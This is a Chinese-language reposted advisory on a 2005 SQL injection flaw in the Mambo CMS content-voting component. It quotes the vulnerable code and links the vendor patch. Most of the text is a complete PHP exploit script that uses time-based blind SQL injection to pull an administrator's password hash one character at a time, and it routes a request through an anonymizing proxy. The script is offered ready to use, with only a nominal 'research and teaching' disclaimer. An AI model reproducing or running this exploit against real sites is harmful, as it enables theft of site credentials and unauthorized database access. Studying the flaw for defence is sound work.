mambo 服务商规定的mysql密码,Mambo com_content远程SQL注入漏洞

发布日期：2005-06-16更新日期：2005-06-16受影响系统：

Mambo Mambo Open Source <= 4.5.2.2不受影响系统：

Mambo Mambo Open Source 4.5.2.3描述：

BUGTRAQ  ID: 13966Mambo是一款开放源代码的WEB内容管理系统。Mambo的com_contents中存在严重的SQL注入漏洞，远程攻击者可能利用此漏洞非法操作数据库。  -- content.php --  100             case 'vote':  101                     recordVote ( $url , $user_rating , $cid ,  $database);  102                     break;  ...  1478                                    $query = "UPDATE  #__content_rating"  1479                                    . "\n SET rating_count =  rating_count + 1,"  1450                                    . "\n rating_sum = rating_sum  + $user_rating,"  1451                                    . "\n lastip = '$currip'"  1452                                    . "\n WHERE content_id = ". $cid  1453                                    ;  ----------------在1450行$user_rating未经任何验证便使用用户提供的数据，导致用户可以获得敏感信息。测试方法：

警 告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！*/if (!(function_exists('curl_init'))) {    echo "cURL extension required\n";    exit;}ini_set("max_execution_time","999999");$benchcount = 150000;$aid= 62;$cid = 2;$charmap = array (48,49,50,51,52,53,54,55,56,57,          97,98,99,100,101,102,          103,104,105,          106,107,108,109,110,111,112,113,          114,115,116,117,118,119,120,121,122          );          if($argv[1]){        $url = $argv[1];    if ($argv[2])        $aid = $argv[2];    if ($argv[3])        $benchcount = $argv[3];    if ($argv[4])        $proxy = $argv[4]; }else {    echo "Usage: ".$argv[0]." [userid] [benchmarkcount] [proxy]\n\n";    echo "\tURL\t URL to mambo site (ex: http://127.0.0.1)\n";    echo "\taid\t userid to get  (default: 62 (admin))\n";    echo "\tbenchmarkcount\t benchmark count  (default: 150000)\n";    echo "\tproxy\t optional proxy url  (ex: http://10.10.10.10:8080)\n";     exit;}// rate from different ip (using http://projectbypass.com)$projectbypass = "http://projectbypass.com/nph-proxy3.cgi/010110A/";$ch = curl_init();curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace("://","/",$url)."/index.php?op \tion=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);// standard page loading time$start = time();$ch = curl_init();if ($proxy){    curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);$res  = curl_exec($ch);curl_close ($ch);$stop = time();$sloadtime = floatval($stop - $start);echo "standard page loading =".$sloadtime."\n"; // benchmark page loading time$start = time();$ch = curl_init();if ($proxy){    curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid \=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($ \benchcount,md5(1)),1))+where+content_id=$cid/*"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);$stop = time();$bloadtime = floatval($stop - $start);echo "bencmark page loading =".$bloadtime."\n"; // check if SQL query failedif (ereg("DB function failed",$res)){    echo "[x] mysql < 4.1 detected - not exploitable\n";    exit();}if ($bloadtime <= $sloadtime + 2){    echo "[x] increase your benchmark count\n";    exit();}echo "Take your time for Teh Tarik... please wait ...\n\n";echo "Result:\n";echo "\tUserid = $aid\n";echo "\tPassword Hash = ";// starting fetch password$benchcount = $benchcount*2;        for($i= 1;$i< 33;$i++){     foreach ($charmap as $char){        $start = time();        echo chr($char);        $ch = curl_init();        if ($proxy){            curl_setopt($ch, CURLOPT_PROXY,$proxy);         }        curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Item \id=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+a \nd+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+co \ntent_id=$cid/*");  curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);        $res=curl_exec ($ch);        curl_close ($ch);        $stop = time();        $xloadtime = floatval($stop - $start);        if (floatval($xloadtime) > $bloadtime){            $hash .= chr($char);            break 1;        }        else {            echo chr(8);        }                if ($char == 103){            echo "\n\n\tNot Vulnerable or Something wrong occur ...\n";            exit;        }            }}echo "\n";?>建议：

厂商补丁：Mambo-----目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载4.5.2.3版本：http://mamboforge.net/frs/download.php/6151/MamboV4.5.2.3-stable.tar.g z

小编推荐：欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术，请 点击这里注册账号，公开课频道价值万元IT培训教程免费学，让您少走弯路、事半功倍，好工作升职加薪！

免责声明：本站系公益性非盈利IT技术普及网，本文由投稿者转载自互联网的公开文章，文末均已注明出处，其内容和图片版权归原网站或作者所有，文中所述不代表本站观点，若有无意侵权或转载不当之处请从网站右下角联系我们处理，谢谢合作！